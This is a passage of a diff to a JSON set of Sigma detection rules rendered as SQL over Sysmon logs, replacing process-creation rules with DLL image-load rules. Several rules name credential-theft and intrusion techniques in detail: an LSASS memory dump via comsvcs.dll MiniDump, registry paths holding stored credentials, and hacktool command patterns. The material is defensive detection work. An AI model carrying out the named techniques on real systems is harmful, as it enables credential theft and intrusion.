Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", + "tags": [ + "attack.execution", + "attack.t1204.002" + ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "Third Party Software DLL Sideloading", + "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_side_load_third_party.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Enumeration for 3rd Party Creds From CLI", - "id": "87a476dc-0079-4583-a985-dee7a20a03de", - "status": "experimental", - "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Unsigned Image Loaded Into LSASS Process", + "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "status": "test", + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.002" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Valid user connecting using RDP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" ], - "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" + "filename": "image_load_unsigned_image_loaded_into_lsass.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", - "author": "Florian Roth (Nextron Systems)", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ + "attack.persistence", "attack.defense_evasion", + "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", - "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", "status": "test", - "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", - "author": "@neu5ron", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + ], + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + }, + { + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1070", "attack.persistence", - "attack.t1542.003" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], - "level": "medium", + "falsepositives": [ + "Unlikely" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bcdedit_susp_execution.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "status": "test", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "VMGuestLib DLL Sideload", + "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "status": "experimental", + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" + "filename": "image_load_side_load_vmguestlib.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "status": "test", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "HackTool - KrbRelayUp Execution", - "id": "12827a56-61a4-476a-a9cb-f3068f191073", - "status": "experimental", - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "author": "Florian Roth (Nextron Systems)", + "title": "CLR DLL Loaded Via Office Applications", + "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "status": "test", + "description": "Detects CLR DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_krbrelayup.yml" + "filename": "image_load_office_dotnet_clr_dll_load.yml" }, { - "title": "Trickbot Malware Reconnaissance Activity", - "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", - "author": "David Burkett, Florian Roth", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Rare System Admin Activity" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Suspicious LOLBIN AccCheckConsole", - "id": "0f6da907-5854-4be6-859a-e9958747b0aa", - "status": "test", - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "status": "experimental", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the UI Accessibility Checker" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "HackTool - Wmiexec Default Powershell Command", - "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "status": "experimental", - "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded 